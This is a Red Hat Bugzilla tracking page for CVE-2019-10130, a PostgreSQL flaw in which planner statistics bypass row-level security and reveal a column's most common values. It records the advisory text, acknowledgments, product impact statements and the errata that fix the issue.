Bug 1707109 (CVE-2019-10130) - CVE-2019-10130 postgresql: Selectivity estimators bypass row security policies
Summary: CVE-2019-10130 postgresql: Selectivity estimators bypass row security policies
Keywords:
Status: CLOSED ERRATA
Alias: CVE-2019-10130
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
low
low
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
URL:
Whiteboard:
Depends On: 1709192 1709193 1709194 1709195 1709196 1709197 1845074 1857227 1872770 1881766 1881774 1909702 1909703 1909714 1909715 1909716
Blocks: 1707112
TreeView+ depends on / blocked
 
Reported: 2019-05-06 20:02 UTC by Pedro Sampaio
Modified: 2021-02-16 21:58 UTC (History)
37 users (show)

Fixed In Version: postgresql 11.3, postgresql 10.8, postgresql 9.6.13, postgresql 9.5.17
Doc Type: If docs needed, set a value
Doc Text:
PostgreSQL maintains column statistics for tables. Certain statistics, such as histograms and lists of most common values, contain values taken from the column. PostgreSQL does not evaluate row security policies before consulting those statistics during query planning; an attacker can exploit this to read the most common values of certain columns. Affected columns are those for which the attacker has SELECT privilege and for which, in an ordinary query, row-level security prunes the set of rows visible to the attacker.
Clone Of:
Environment:
Last Closed: 2020-09-08 13:17:46 UTC
Embargoed:

Attachments (Terms of Use)


Links
System ID Private Priority Status Summary Last Updated
Red Hat Product Errata RHBA-2020:5643 0 None None None 2020-12-21 12:04:42 UTC
Red Hat Product Errata RHSA-2020:3669 0 None None None 2020-09-08 09:49:16 UTC
Red Hat Product Errata RHSA-2020:4295 0 None None None 2020-10-21 13:06:38 UTC
Red Hat Product Errata RHSA-2020:5619 0 None None None 2020-12-17 15:52:53 UTC
Red Hat Product Errata RHSA-2020:5661 0 None None None 2020-12-22 08:53:37 UTC
Red Hat Product Errata RHSA-2020:5664 0 None None None 2020-12-22 09:26:37 UTC
Red Hat Product Errata RHSA-2021:0164 0 None None None 2021-01-18 09:59:54 UTC
Red Hat Product Errata RHSA-2021:0166 0 None None None 2021-01-18 16:18:57 UTC
Red Hat Product Errata RHSA-2021:0167 0 None None None 2021-01-18 16:20:13 UTC

Description Pedro Sampaio 2019-05-06 20:02:17 UTC 
PostgreSQL maintains column statistics for tables. Certain statistics, such
as histograms and lists of most common values, contain values taken from the
column. PostgreSQL does not evaluate row security policies before consulting
those statistics during query planning; an attacker can exploit this to read
the most common values of certain columns. Affected columns are those for
which the attacker has SELECT privilege and for which, in an ordinary query,
row-level security prunes the set of rows visible to the attacker.
Comment 1 Pedro Sampaio 2019-05-06 20:02:23 UTC 
Acknowledgments:

Name: Noah Misch, the PostgreSQL Project
Upstream: Dean Rasheed
Comment 3 Doran Moppert 2019-05-13 07:22:59 UTC 
Created mingw-postgresql tracking bugs for this issue:

Affects: fedora-all [bug 1709193]


Created postgresql tracking bugs for this issue:

Affects: fedora-all [bug 1709192]
Comment 5 Doran Moppert 2019-05-15 05:15:56 UTC 
External References:

https://www.postgresql.org/about/news/1939/
Comment 6 Doran Moppert 2019-06-28 05:14:25 UTC 
Statement:

This vulnerability requires row level security to be in use, and an attacker to be able to execute crafted queries against the target PostgreSQL database. Neither of these conditions is true in Red Hat Ansible Tower, Red Hat CloudForms or Red Hat Satellite.
Comment 9 errata-xmlrpc 2020-09-08 09:49:11 UTC 
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 8

Via RHSA-2020:3669 https://access.redhat.com/errata/RHSA-2020:3669
Comment 10 Product Security DevOps Team 2020-09-08 13:17:46 UTC 
This bug is now closed. Further updates for individual products will be reflected on the CVE page(s):

https://access.redhat.com/security/cve/cve-2019-10130
Comment 17 errata-xmlrpc 2020-10-21 13:06:34 UTC 
This issue has been addressed in the following products:

  Red Hat Software Collections for Red Hat Enterprise Linux 7

Via RHSA-2020:4295 https://access.redhat.com/errata/RHSA-2020:4295
Comment 24 errata-xmlrpc 2020-12-17 15:52:49 UTC 
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 8

Via RHSA-2020:5619 https://access.redhat.com/errata/RHSA-2020:5619
Comment 25 errata-xmlrpc 2020-12-22 08:53:34 UTC 
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 8.0 Update Services for SAP Solutions

Via RHSA-2020:5661 https://access.redhat.com/errata/RHSA-2020:5661
Comment 26 errata-xmlrpc 2020-12-22 09:26:31 UTC 
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 8.0 Update Services for SAP Solutions

Via RHSA-2020:5664 https://access.redhat.com/errata/RHSA-2020:5664
Comment 27 errata-xmlrpc 2021-01-18 09:59:49 UTC 
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 8.2 Extended Update Support

Via RHSA-2021:0164 https://access.redhat.com/errata/RHSA-2021:0164
Comment 28 errata-xmlrpc 2021-01-18 16:18:54 UTC 
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 8.1 Extended Update Support

Via RHSA-2021:0166 https://access.redhat.com/errata/RHSA-2021:0166
Comment 29 errata-xmlrpc 2021-01-18 16:20:07 UTC 
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 8.1 Extended Update Support

Via RHSA-2021:0167 https://access.redhat.com/errata/RHSA-2021:0167
Note You need to log in before you can comment on or make changes to this bug.